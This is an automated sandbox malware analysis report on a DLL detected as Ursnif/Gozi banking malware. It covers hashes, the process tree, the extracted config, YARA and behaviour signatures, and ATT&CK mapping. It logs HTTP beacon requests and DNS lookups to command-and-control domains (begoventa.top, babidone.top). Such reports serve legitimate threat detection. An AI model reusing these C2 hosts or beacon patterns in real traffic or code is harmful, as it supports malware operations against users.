Play interactive tour

Edit tour

Analysis Report zQ32b1FVcL.dll

Overview

General Information

Sample Name:	zQ32b1FVcL.dll
Analysis ID:	338663
MD5:	eed4174c8a96dd7b611d9f109c71e20f
SHA1:	c471724d86fd269a19932280361ca52e1e294f19
SHA256:	e5dc940537146c1c56b8a8f91234484c83223943c13d2fbf354f0cfdec13c258
Tags:	dllGozi
Most interesting Screenshot:

Detection

Ursnif

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Detected potential crypto function

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

PE file contains strange resources

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6132 cmdline: loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)

iexplore.exe (PID: 6388 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6496 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1140 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4144 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3288 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6620 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3984 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6772 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@320946", "dns": "320946", "version": "250171", "uptime": "266", "crc": "1", "id": "5533", "user": "253fc4ee08f8d2d8cdc8873aab08ddd5", "soft": "2"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6132	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: loaddll32.exe.6132.1.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@320946", "dns": "320946", "version": "250171", "uptime": "266", "crc": "1", "id": "5533", "user": "253fc4ee08f8d2d8cdc8873aab08ddd5", "soft": "2"}

Source: 1.2.loaddll32.exe.cc0000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.2.loaddll32.exe.10000000.4.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: zQ32b1FVcL.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00CF523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

1_2_00CF523C

Source: global traffic	HTTP traffic detected: GET /images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: begoventa.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: begoventa.topConnection: Keep-Alive

Source: msapplication.xml0.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x4837d4a4,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: babidone.top

Source: {8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat.24.dr	String found in binary or memory: http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	String found in binary or memory: http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd
Source: {B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat.34.dr	String found in binary or memory: http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9
Source: zQ32b1FVcL.dll	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: zQ32b1FVcL.dll	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: zQ32b1FVcL.dll	String found in binary or memory: http://ocsp.sectigo.com0
Source: msapplication.xml.16.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.16.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.16.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.16.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.16.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.16.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.16.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.16.dr	String found in binary or memory: http://www.youtube.com/
Source: loaddll32.exe, 00000001.00000002.589354244.000000000050B000.00000004.00000020.sdmp	String found in binary or memory: https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p
Source: zQ32b1FVcL.dll	String found in binary or memory: https://sectigo.com/CPS0D

Source: unknown

Network traffic detected: HTTP traffic on port 49754 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10001812 NtMapViewOfSection,	1_2_10001812
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10001DD0 GetProcAddress,NtCreateSection,memset,	1_2_10001DD0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_100022E5 NtQueryVirtualMemory,	1_2_100022E5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CF9932 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_00CF9932
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFB2C1 NtQueryVirtualMemory,	1_2_00CFB2C1

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_100020C4	1_2_100020C4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFB09C	1_2_00CFB09C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFEC48	1_2_00CFEC48
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFEC41	1_2_00CFEC41
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CF99FC	1_2_00CF99FC

Source: zQ32b1FVcL.dll

Static PE information: invalid certificate

Source: zQ32b1FVcL.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: zQ32b1FVcL.dll

Binary or memory string: OriginalFilename360SkinView.exeF vs zQ32b1FVcL.dll

Source: zQ32b1FVcL.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: classification engine

Classification label: mal64.troj.winDLL@13/44@4/3

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00CF244A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_00CF244A

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFD53763C3DA639732.TMP

Jump to behavior

Source: zQ32b1FVcL.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: zQ32b1FVcL.dll

Static PE information: section name: .data2

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_100020B3 push ecx; ret	1_2_100020C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002060 push ecx; ret	1_2_10002069
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFACD0 push ecx; ret	1_2_00CFACD9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFB08B push ecx; ret	1_2_00CFB09B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C81830 push edx; ret	1_2_00C81934
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C644CE push edx; ret	1_2_00C644CF
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C611C0 push eax; iretd	1_2_00C611D6
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C615D6 push ecx; ret	1_2_00C615D7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C63DFA push ecx; retf	1_2_00C63E01
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C65116 pushad ; ret	1_2_00C65129
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C63E99 push FFFFFFCFh; retf	1_2_00C63EC7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C63A4D push 92BB463Fh; iretd	1_2_00C63A52
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C643F7 push ss; ret	1_2_00C643F8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C63F02 push dword ptr [edi+64h]; iretd	1_2_00C63F0C

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

1_2_00CF523C

Source: loaddll32.exe, 00000001.00000002.589296510.00000000004F9000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAWH

Source: C:\Windows\System32\loaddll32.exe

Memory protected: page execute read | page guard

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00CF5DC6 cpuid

1_2_00CF5DC6

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_100019C7 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

1_2_100019C7

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00CF5DC6 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_00CF5DC6

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10001799 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_10001799

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection2	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Security Software Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.loaddll32.exe.cf0000.3.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
